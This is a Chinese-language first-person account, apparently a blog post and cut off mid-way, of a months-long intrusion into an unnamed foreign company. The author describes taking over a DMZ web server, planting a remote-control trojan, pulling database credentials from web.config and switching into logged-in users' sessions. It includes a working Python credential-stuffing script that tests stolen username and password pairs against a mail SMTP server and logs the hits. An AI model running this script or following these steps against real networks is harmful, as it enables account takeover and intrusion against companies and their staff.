写在之前的废话:小菜技术能力不行,如果你觉得此文实在看不下去,还请PASS掉。如果你对我的文章有兴趣,可以与我一起交流。文章因为敏感无图,业内人士看看自然懂。在这里感谢一下那位一直在我背后默默指导我的那位大牛,要不是你,就不会有今天我,借这这个平台向你衷声说句:谢谢你!
由于APT耗时长,需要的支持多,而且目标敏感。在这里,我们不便介绍目标背景,也不多说其他的,直接来进入主题。
某国某目标,我盯了它大概半年。嗯,终于有一天,我觉得时机成熟,下手吧。
在渗透目标的前期,我们需要了解对方公司的安全意识。以及需要搜集所有网站的IP,公司的出口,以及公司网段所存在的B-C段,公司人员邮箱,公司人员爱好,facebook等信息。
首先,我把目标公司的WEB都给搜集好了,大公司一般C段都是在一起的。而我有个习惯,在渗透目标的时候,先喜欢把OWA的段找出来扫一下。这样大概的就知道了公司的架构情况。而很多时候,大公司都是会把WEB段给区分的,哪几个外网IP段是管理WEB的,哪几个段是放数据库的。不过随着网络越趋复杂,就算拿到了WEB 也就是在DMZ徘徊。不过只要拿到了WEB就好说了。Go把。
千辛万苦拿下来了这个公司的一个WEB,WEB如何拿下来咱们不多说。不是重点。当我分析内网情况的时候,环境就是在DMZ,system权限。通过判断协议,TCP HTTP都没问题。于是,我把DMZ WEB给中了一个马,这样更容易操作,至少得到了一个交互式的shell。先把远控抛开不说,通过netstat -ano分析。WEB服务器连上了在内部的一台数据库服务器。于是我找到了WEB服务器的web.config脚本,成功得到了数据库账户密码,但是数据库账户权限非SA,而且SQL SERVER版本是2008(悲剧,MSSQL 2000的话直接就远程溢出了).没办法,就算我们导了个shell,又有何用?不着急,慢慢分析,于是我试着去ping内网数据库机器,PING不通,接着我在拿S扫描器开了很小的线程,扫了扫WEB连接的数据库那台机器。和我猜想的结果是一样,这种情况我不是第一次碰到了。就只有个1433能够过去。这时,我猜想大概的内网架构是这样的:
WEB–>防火墙–>数据库服务器–>内网(而当我搞下来,发现情况并不是这样的)
算了,没办法。先不管了,连上数据库,分析数据,看能否去撞号,登OWA或者邮箱之类的。
于是写了个PYTHON脚本,去跑他们的OWA(这个脚本是N年前写的,可能不太符合,大家去改改就好了。原理差不多):
import smtplib ,sys ,time
def main():
server = "smtp.live.com" #gmail smtp.gmail.com, yahoo smtp.mail.yahoo.com
fp = open("D:\python\\hotmail.txt")
fp1 = open("d:\python\\save.txt", 'a+')
while 1:
line = fp.readline()
uandp = line.split(' ')
name = uandp[0]
name = name.split('@')[0]
pwd = uandp[1]
pwd = pwd.split("\n")[0]
try:
smtp = smtplib.SMTP_SSL(server,465) # gmail 465
except:
print "[*]Connect Error."
sys.exit(0)
pass
try:
#smtp.set_debuglevel(1)
#smtp.ehlo()
#smtp.starttls()
smtp.ehlo()
smtp.login(name,pwd)
except:
print "[-]:%s:%s" % (name, pwd)
pass
#time.sleep(1)
else:
out = "[+]:%s:%s\n" % (name, pwd)
print out
fp1.write(out)
fp1.flush()
smtp.quit()
smtp.close()
fp.close()
fp1.close()
if __name__=="__main__":
main()
分析完数据,把数据库中的目标人物邮箱都给挑选出来。跑完。手工测试VPN,都失败了。没办法,继续另寻其他的路子。
来回到远控,通过分析,本机WEB有一个员工登录的地方,但是是.NET的。不能改代码。因为如果改写代码,需要重新编译(这里可能我说的有错。)但是有一个员工登录的地方我们就已经足够了,这里也先不管它。先分析再说。
我的远控是可以切换用户的,只要有用户在,可以切换到对方的用户下。首先分析了本地管理组的用户,抓密码。Query user 发现有几个用户在线。于是我切换到每个用户,主要就是查看IPC 。功夫不负有心人,当我切换到B的会话下的时候,NET USE看了看。大家猜我看到了啥?(可能你会想,咱们不是在DMZ吗?会话咋来的? 管理员从内网连过来。)
C:\ProgramData>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
\\TSCLIENT\C Microsoft Terminal Services
\\